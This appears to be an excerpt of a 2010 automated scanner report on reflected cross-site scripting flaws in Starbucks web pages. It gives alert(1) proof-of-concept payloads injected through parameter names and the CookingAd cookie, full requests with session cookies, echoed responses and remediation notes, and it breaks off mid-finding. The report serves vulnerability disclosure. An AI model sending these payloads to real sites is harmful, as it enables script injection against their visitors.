The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:11 GMT Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/> ...[SNIP]...
3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/nutrition/35-under-350
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:40 GMT Connection: close Content-Length: 40761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/> ...[SNIP]...
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:24:22 GMT Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/> ...[SNIP]...
3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:39 GMT Content-Length: 33815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/> ...[SNIP]...
3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/whats-new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:19 GMT Connection: close Content-Length: 44105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/> ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:38 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14241 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:42 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... weredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/poweredbycooking.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19859 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:58 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29740 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:50 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29705 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:52 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:59 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee-machines/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBda449</script><script>alert(1)</script>9e10653ba75;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21134 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:23 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... eName="Equipment Homepage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Equipment Homepage" var s_prop3="SBPTPAHP1SHTBDA449</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>9E10653BA75" var s_prop4="" var s_prop5="" var s_prop6="/coffee-machines/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8163c</script><script>alert(1)</script>ec3893ac889 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB8163c</script><script>alert(1)</script>ec3893ac889;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:50 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB8163C</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>EC3893AC889" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdb1e</script><script>alert(1)</script>221b4ee20e3 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
